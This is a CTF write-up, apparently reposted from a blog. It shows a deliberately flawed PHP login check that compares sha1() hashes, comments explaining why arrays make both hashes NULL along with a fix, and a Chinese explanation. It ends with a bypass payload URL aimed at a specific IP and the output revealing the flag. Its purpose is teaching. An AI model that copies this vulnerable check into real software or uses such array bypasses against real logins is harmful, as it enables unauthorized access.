<?php
// Login check from a CTF exercise. Behaviour is kept exactly as published;
// the comments describe why the check is unsound and what a fix looks like.
//
// Weaknesses visible in this listing:
//   * $_GET values are never type-checked. A parameter sent as name[]=...
//     arrives as an array, not a string.
//   * On PHP 7 and earlier, sha1() given an array emits a warning and returns
//     NULL, so the strict hash comparison below degrades to NULL === NULL.
//     PHP 8 throws a TypeError instead.
//   * var_dump() writes the raw request values and their hashes into the
//     response (unescaped unless an extension overrides var_dump).
//
// A hardened version would reject non-string input with is_string() before
// hashing, compare digests with hash_equals(), and not echo request data back.
$flag = "flag";

if (!isset($_GET['name'], $_GET['password'])) {
    // At least one of the two parameters is missing.
    echo "\nLogin first!\n";
} else {
    // Debug output: raw inputs first, then their SHA-1 digests, in this order.
    var_dump($_GET['name']);
    echo "\n";
    var_dump($_GET['password']);
    var_dump(sha1($_GET['name']));
    var_dump(sha1($_GET['password']));

    if ($_GET['name'] == $_GET['password']) {
        // Loose comparison: identical (or loosely equal) inputs are refused.
        echo "\nYour password can not be your name!\n";
    } elseif (sha1($_GET['name']) === sha1($_GET['password'])) {
        // Intended to require a SHA-1 collision between two different strings.
        // The digests are recomputed here, exactly as in the original.
        exit('Flag: ' . $flag);
    } else {
        echo "\nInvalid password.\n";
    }
}
?>
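sha1() 跟 md5() 函数一样,参数为数组时(PHP 7 及更早版本)会发出警告并返回 NULL,于是两边的哈希比较变成 NULL === NULL,因此可以用数组绕过;防御方法是在计算哈希前先用 is_string() 校验参数类型。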
payload
http://123.206.87.240:9009/7.php?name[]=1&password[]=2
得到
array(1) { [0]=> string(1) "1" } array(1) { [0]=> string(1) "2" } NULL NULL Flag: flag{bugku--daimasj-a2}
转载于:https://www.cnblogs.com/gaonuoqi/p/11407477.html